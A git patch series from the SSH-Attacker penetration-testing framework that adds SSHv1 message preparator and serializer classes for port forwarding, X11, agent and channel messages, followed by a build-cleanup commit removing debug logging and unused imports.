@@ -0,0 +1,34 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.PortForwardRequestMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.X11OpenMessageSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class PortForwardRequestMessageSSHV1Preparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + public PortForwardRequestMessageSSHV1Preparator(Chooser chooser, PortForwardRequestMessageSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_CMSG_PORT_FORWARD_REQUEST); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + if (getObject().getServerPort() == null) { + getObject().setServerPort(0); + } + LOGGER.debug(getObject().getServerPort().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/PortOpenMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/PortOpenMessageSSHV1Preparator.java new file mode 100644 index 000000000..782403765 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/PortOpenMessageSSHV1Preparator.java @@ -0,0 +1,34 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.PortForwardRequestMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.PortOpenMessageSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class PortOpenMessageSSHV1Preparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + public PortOpenMessageSSHV1Preparator(Chooser chooser, PortOpenMessageSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_MSG_PORT_OPEN); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + if (getObject().getLocalChannel() == null) { + getObject().setLocalChannel(0); + } + LOGGER.debug(getObject().getLocalChannel().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/X11OpenMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/X11OpenMessageSSHV1Preparator.java new file mode 100644 index 000000000..4d844c864 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/X11OpenMessageSSHV1Preparator.java @@ -0,0 +1,34 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelDataMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.X11OpenMessageSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class X11OpenMessageSSHV1Preparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + public X11OpenMessageSSHV1Preparator(Chooser chooser, X11OpenMessageSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_SMSG_X11_OPEN); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + if (getObject().getLocalChannel() == null) { + getObject().setLocalChannel(0); + } + LOGGER.debug(getObject().getLocalChannel().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AgentOpenMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AgentOpenMessageSSHV1Serializier.java new file mode 100644 index 000000000..e0adc6c3b --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AgentOpenMessageSSHV1Serializier.java @@ -0,0 +1,34 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.constants.DataFormatConstants; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.AgentOpenMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitStatusMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class AgentOpenMessageSSHV1Serializier extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public AgentOpenMessageSSHV1Serializier(AgentOpenMessageSSH1 message) { + super(message); + } + + private void serializeExitStatus() { + LOGGER.debug("Agent opening on local channel {}", message.getLocalChannel().getValue()); + appendInt(message.getLocalChannel().getValue(), DataFormatConstants.UINT32_SIZE); + } + + @Override + public void serializeMessageSpecificContents() { + serializeExitStatus(); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AgentRequestForwardingMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AgentRequestForwardingMessageSSHV1Serializier.java new file mode 100644 index 000000000..2011e42f2 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AgentRequestForwardingMessageSSHV1Serializier.java @@ -0,0 +1,26 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.AgentRequestForwardingMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class AgentRequestForwardingMessageSSHV1Serializier extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public AgentRequestForwardingMessageSSHV1Serializier(AgentRequestForwardingMessageSSH1 message) { + super(message); + } + + @Override + public void serializeMessageSpecificContents() {} +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelCloseConfirmationMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelCloseConfirmationMessageSSHV1Serializier.java new file mode 100644 index 000000000..7bd7b9e20 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelCloseConfirmationMessageSSHV1Serializier.java @@ -0,0 +1,34 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.constants.DataFormatConstants; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelCloseConfirmationMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelCloseMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ChannelCloseConfirmationMessageSSHV1Serializier extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public ChannelCloseConfirmationMessageSSHV1Serializier(ChannelCloseConfirmationMessageSSH1 message) { + super(message); + } + + private void serializeExitStatus() { + LOGGER.debug("Closed remotechannel " + message.getRemoteChannel().getValue()); + appendInt(message.getRemoteChannel().getValue(), DataFormatConstants.UINT32_SIZE); + } + + @Override + public void serializeMessageSpecificContents() { + serializeExitStatus(); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelCloseMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelCloseMessageSSHV1Serializier.java new file mode 100644 index 000000000..2e89a1052 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelCloseMessageSSHV1Serializier.java @@ -0,0 +1,34 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.constants.DataFormatConstants; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelCloseMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelOpenFailureMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ChannelCloseMessageSSHV1Serializier extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public ChannelCloseMessageSSHV1Serializier(ChannelCloseMessageSSH1 message) { + super(message); + } + + private void serializeExitStatus() { + LOGGER.debug("Closed remotechannel " + message.getRemoteChannel().getValue()); + appendInt(message.getRemoteChannel().getValue(), DataFormatConstants.UINT32_SIZE); + } + + @Override + public void serializeMessageSpecificContents() { + serializeExitStatus(); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelDataMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelDataMessageSSHV1Serializier.java new file mode 100644 index 000000000..7e1c22a32 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelDataMessageSSHV1Serializier.java @@ -0,0 +1,38 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.constants.DataFormatConstants; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelDataMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelOpenFailureMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.nio.charset.StandardCharsets; + +public class ChannelDataMessageSSHV1Serializier extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public ChannelDataMessageSSHV1Serializier(ChannelDataMessageSSH1 message) { + super(message); + } + + private void serializeExitStatus() { + LOGGER.debug("Failed Sending data on channel {} with data {}", message.getRemoteChannel().getValue(),message.getData().getValue()); + appendInt(message.getRemoteChannel().getValue(), DataFormatConstants.UINT32_SIZE); + appendInt(message.getData().getValue().length(), DataFormatConstants.UINT32_SIZE); + appendString(message.getData().getValue(), StandardCharsets.UTF_8); + } + + @Override + public void serializeMessageSpecificContents() { + serializeExitStatus(); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/PortForwardRequestMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/PortForwardRequestMessageSSHV1Serializier.java new file mode 100644 index 000000000..1ebe7066a --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/PortForwardRequestMessageSSHV1Serializier.java @@ -0,0 +1,39 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.constants.DataFormatConstants; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.PortForwardRequestMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.X11OpenMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.nio.charset.StandardCharsets; + +public class PortForwardRequestMessageSSHV1Serializier extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public PortForwardRequestMessageSSHV1Serializier(PortForwardRequestMessageSSH1 message) { + super(message); + } + + private void serializeExitStatus() { + LOGGER.debug("Forwarding {} to {}:{}", message.getServerPort().getValue(),message.getHostToConnect().getValue(),message.getPortToConnect().getValue()); + appendInt(message.getServerPort().getValue(), DataFormatConstants.UINT32_SIZE); + appendInt(message.getHostToConnect().getValue().length(), DataFormatConstants.UINT32_SIZE); + appendString(message.getHostToConnect().getValue(), StandardCharsets.UTF_8); + appendInt(message.getPortToConnect().getValue(), DataFormatConstants.UINT32_SIZE); + } + + @Override + public void serializeMessageSpecificContents() { + serializeExitStatus(); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/PortOpenMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/PortOpenMessageSSHV1Serializier.java new file mode 100644 index 000000000..59574b02d --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/PortOpenMessageSSHV1Serializier.java @@ -0,0 +1,41 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.constants.DataFormatConstants; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.PortForwardRequestMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.PortOpenMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.nio.charset.StandardCharsets; + +public class PortOpenMessageSSHV1Serializier extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public PortOpenMessageSSHV1Serializier(PortOpenMessageSSH1 message) { + super(message); + } + + private void serializeExitStatus() { + LOGGER.warn("Opening Port {} to {} on Channel {} with originator_string{}", message.getPort().getValue(), message.getHostName().getValue(),message.getLocalChannel().getValue(), message.getOriginatorString()); + appendInt(message.getLocalChannel().getValue(), DataFormatConstants.UINT32_SIZE); + appendInt(message.getHostName().getValue().length(), DataFormatConstants.UINT32_SIZE); + appendString(message.getHostName().getValue(), StandardCharsets.UTF_8); + appendInt(message.getPort().getValue(), DataFormatConstants.UINT32_SIZE); + appendInt(message.getOriginatorString().getValue().length(), DataFormatConstants.UINT32_SIZE); + appendString(message.getOriginatorString().getValue(), StandardCharsets.UTF_8); + } + + @Override + public void serializeMessageSpecificContents() { + serializeExitStatus(); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/X11OpenMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/X11OpenMessageSSHV1Serializier.java new file mode 100644 index 000000000..e97bda2ce --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/X11OpenMessageSSHV1Serializier.java @@ -0,0 +1,38 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.constants.DataFormatConstants; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelDataMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.X11OpenMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.nio.charset.StandardCharsets; + +public class X11OpenMessageSSHV1Serializier extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public X11OpenMessageSSHV1Serializier(X11OpenMessageSSH1 message) { + super(message); + } + + private void serializeExitStatus() { + LOGGER.debug("Failed Sending data on channel {} with data {}", message.getLocalChannel().getValue(),message.getOriginatorString().getValue()); + appendInt(message.getLocalChannel().getValue(), DataFormatConstants.UINT32_SIZE); + appendInt(message.getOriginatorString().getValue().length(), DataFormatConstants.UINT32_SIZE); + appendString(message.getOriginatorString().getValue(), StandardCharsets.UTF_8); + } + + @Override + public void serializeMessageSpecificContents() { + serializeExitStatus(); + } +} From f7bfd6012a4542d9335a96e6e5b666883449415c Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Thu, 29 Feb 2024 14:58:00 +0100 Subject: [PATCH 148/176] Build cleanup --- .../parser/BinaryPacketParserSSHv1.java | 40 ------------------- .../handler/AgentOpenMessageSSHV1Handler.java | 1 - ...tRequestForwardingMessageSSHV1Handler.java | 4 +- ...lCloseConfirmationMessageSSHV1Handler.java | 8 ++-- .../ChannelCloseMessageSSHV1Handler.java | 5 ++- .../ChannelDataMessageSSHV1Handler.java | 6 ++- ...elOpenConfirmationMessageSSHV1Handler.java | 7 +++- ...ChannelOpenFailureMessageSSHV1Handler.java | 7 +++- ...PortForwardRequestMessageSSHV1Handler.java | 10 +++-- .../handler/PortOpenMessageSSHV1Handler.java | 8 +++- .../RsaAuthChallengeMessageSSHV1Handler.java | 5 +-- .../handler/RsaAuthMessageSSHV1Handler.java | 2 - .../handler/X11OpenMessageSSHV1Handler.java | 6 ++- .../ssh1/message/AgentOpenMessageSSH1.java | 8 +--- .../AgentRequestForwardingMessageSSH1.java | 17 ++++---- .../ChannelCloseConfirmationMessageSSH1.java | 17 ++++---- .../ssh1/message/ChannelCloseMessageSSH1.java | 8 +--- .../ssh1/message/ChannelDataMessageSSH1.java | 9 +---- .../ChannelOpenConfirmationMessageSSH1.java | 18 +++++---- .../ChannelOpenFailureMessageSSH1.java | 6 +-- .../PortForwardRequestMessageSSH1.java | 13 +++--- .../ssh1/message/PortOpenMessageSSH1.java | 18 +++------ .../message/RsaAuthChallengeMessageSSH1.java | 12 ++++-- .../ssh1/message/RsaAuthMessageSSH1.java | 16 ++++---- .../ssh1/message/X11OpenMessageSSH1.java | 15 +++---- .../parser/AgentOpenMessageSSHV1Parser.java | 3 +- ...ntRequestForwardingMessageSSHV1Parser.java | 7 ++-- ...elCloseConfirmationMessageSSHV1Parser.java | 7 ++-- .../ChannelCloseMessageSSHV1Parser.java | 4 +- .../parser/ChannelDataMessageSSHV1Parser.java | 3 +- ...nelOpenConfirmationMessageSSHV1Parser.java | 6 +-- .../ChannelOpenFailureMessageSSHV1Parser.java | 7 ++-- .../PortForwardRequestMessageSSHV1Parser.java | 7 ++-- .../parser/PortOpenMessageSSHV1Parser.java | 4 +- .../RsaAuthChallengeMessageSSHV1Parser.java | 8 ++-- .../parser/RsaAuthMessageSSHV1Parser.java | 11 +---- .../parser/X11OpenMessageSSHV1Parser.java | 4 +- .../AgentOpenMessageSSHV1Preparator.java | 1 - ...questForwardingMessageSSHV1Preparator.java | 7 ++-- ...oseConfirmationMessageSSHV1Preparator.java | 7 ++-- .../ChannelCloseMessageSSHV1Preparator.java | 4 +- .../ChannelDataMessageSSHV1Preparator.java | 4 +- ...penConfirmationMessageSSHV1Preparator.java | 7 ++-- ...nnelOpenFailureMessageSSHV1Preparator.java | 7 ++-- ...tForwardRequestMessageSSHV1Preparator.java | 7 ++-- .../PortOpenMessageSSHV1Preparator.java | 1 - ...saAuthMessageChallengeSSHV1Preparator.java | 7 ++-- .../RsaAuthMessageSSHV1Preparator.java | 1 - .../X11OpenMessageSSHV1Preparator.java | 1 - .../AgentOpenMessageSSHV1Serializier.java | 1 - ...uestForwardingMessageSSHV1Serializier.java | 7 ++-- ...seConfirmationMessageSSHV1Serializier.java | 7 ++-- .../ChannelCloseMessageSSHV1Serializier.java | 4 +- .../ChannelDataMessageSSHV1Serializier.java | 12 +++--- ...enConfirmationMessageSSHV1Serializier.java | 7 ++-- ...nelOpenFailureMessageSSHV1Serializier.java | 4 +- ...ForwardRequestMessageSSHV1Serializier.java | 13 +++--- .../PortOpenMessageSSHV1Serializier.java | 14 ++++--- ...aAuthChallengeMessageSSHV1Serializier.java | 4 +- .../RsaAuthMessageSSHV1Serializier.java | 1 - .../X11OpenMessageSSHV1Serializier.java | 12 +++--- 61 files changed, 212 insertions(+), 265 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParserSSHv1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParserSSHv1.java index 67d0e2b99..b7e05383f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParserSSHv1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParserSSHv1.java @@ -31,15 +31,6 @@ public class BinaryPacketParserSSHv1 extends AbstractPacketParser 0) { - LOGGER.debug("MAC: {}", ArrayConverter.bytesToHexString(binaryPacket.getMac())); - } else { - LOGGER.debug("MAC: [empty]"); - } - }*/ - // return binaryPacket; } catch (CryptoException e) { LOGGER.warn("Caught a CryptoException while parsing an encrypted binary packet", e); - // - // - // return null; } } @@ -191,14 +165,8 @@ private void parseEAMPacket(BinaryPacketSSHv1 binaryPacket) throws CryptoExcepti } firstBlock = ArrayConverter.concatenate(firstBlock, decryptedBlock); decryptedByteCount += blockSize; - LOGGER.debug( - "LENGHT_FIELD_LENGHT = {} - DECRYPTED = {} - DECRYPTED_LENGHT = {}", - BinaryPacketConstants.LENGTH_FIELD_LENGTH, - firstBlock, - firstBlock.length); } while (decryptedByteCount < BinaryPacketConstants.LENGTH_FIELD_LENGTH); // setPointer(pointer); - LOGGER.debug("DONE WITH PARSING LENGHT"); computations.setPlainPacketBytes(firstBlock, true); binaryPacket.setLength( @@ -210,19 +178,11 @@ private void parseEAMPacket(BinaryPacketSSHv1 binaryPacket) throws CryptoExcepti binaryPacket.setCiphertext( parseByteArrayField(paddingLenght + binaryPacket.getLength().getValue())); - /* binaryPacket.setMac( - parseByteArrayField(activeDecryptCipher.getMacAlgorithm().getOutputSize()));*/ - LOGGER.debug("DONE WITH PARSING parseEAMPacket "); } private void parseSSHv1Packet(BinaryPacketSSHv1 binaryPacket) throws CryptoException { - LOGGER.debug("PARSING SSHv1Packet"); binaryPacket.setLength(parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH)); - LOGGER.debug("LENGHT = {}", binaryPacket.getLength()); - int padding_lenght = 8 - (binaryPacket.getLength().getValue() % 8); - LOGGER.debug("PADDING LENGHT = {}", padding_lenght); - binaryPacket.setCiphertext( parseByteArrayField(binaryPacket.getLength().getValue() + padding_lenght)); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AgentOpenMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AgentOpenMessageSSHV1Handler.java index 73fb1880c..6e4adc50f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AgentOpenMessageSSHV1Handler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AgentOpenMessageSSHV1Handler.java @@ -10,7 +10,6 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.ssh1.message.AgentOpenMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitStatusMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AgentRequestForwardingMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AgentRequestForwardingMessageSSHV1Handler.java index dc6d5580d..28ba71e78 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AgentRequestForwardingMessageSSHV1Handler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AgentRequestForwardingMessageSSHV1Handler.java @@ -10,11 +10,11 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.ssh1.message.AgentRequestForwardingMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class AgentRequestForwardingMessageSSHV1Handler extends SshMessageHandler { +public class AgentRequestForwardingMessageSSHV1Handler + extends SshMessageHandler { private static final Logger LOGGER = LogManager.getLogger(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelCloseConfirmationMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelCloseConfirmationMessageSSHV1Handler.java index 3bcfe33e9..50f58e6ef 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelCloseConfirmationMessageSSHV1Handler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelCloseConfirmationMessageSSHV1Handler.java @@ -10,11 +10,11 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelCloseConfirmationMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelCloseMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class ChannelCloseConfirmationMessageSSHV1Handler extends SshMessageHandler { +public class ChannelCloseConfirmationMessageSSHV1Handler + extends SshMessageHandler { private static final Logger LOGGER = LogManager.getLogger(); @@ -24,6 +24,8 @@ public ChannelCloseConfirmationMessageSSHV1Handler(SshContext context) { @Override public void adjustContext(ChannelCloseConfirmationMessageSSH1 message) { - LOGGER.warn("Recieved channel open failure for channel{}", message.getRemoteChannel().getValue()); + LOGGER.warn( + "Recieved channel open failure for channel{}", + message.getRemoteChannel().getValue()); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelCloseMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelCloseMessageSSHV1Handler.java index 2affd9331..92fcdf594 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelCloseMessageSSHV1Handler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelCloseMessageSSHV1Handler.java @@ -10,7 +10,6 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelCloseMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelOpenFailureMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -24,6 +23,8 @@ public ChannelCloseMessageSSHV1Handler(SshContext context) { @Override 